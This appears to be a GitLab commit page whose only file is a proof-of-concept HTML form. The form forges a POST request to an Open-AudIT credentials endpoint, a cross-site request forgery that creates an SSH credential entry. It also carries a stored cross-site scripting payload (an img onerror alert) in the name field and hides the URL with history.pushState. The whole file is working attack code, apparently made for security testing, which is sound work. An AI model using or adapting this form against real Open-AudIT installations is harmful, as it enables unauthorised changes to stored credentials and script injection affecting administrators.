Commit 01fe50ee authored by Kilian Low's avatar Kilian Low

html form

parent c75ad14d
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:3000/omk/open-audit/credentials" method="POST">
<input type="hidden" name="data&#91;attributes&#93;&#91;name&#93;" value="<img src=x onerror=alert('hacked');>" />
<input type="hidden" name="data&#91;attributes&#93;&#91;org&#95;id&#93;" value="1" />
<input type="hidden" name="data&#91;attributes&#93;&#91;description&#93;" value="CSRF" />
<input type="hidden" name="data&#91;attributes&#93;&#91;type&#93;" value="ssh" />
<input type="hidden" name="data&#91;attributes&#93;&#91;credentials&#93;&#91;username&#93;" value="test" />
<input type="hidden" name="data&#91;attributes&#93;&#91;credentials&#93;&#91;password&#93;" value="test" />
<input type="hidden" name="data&#91;type&#93;" value="credentials" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment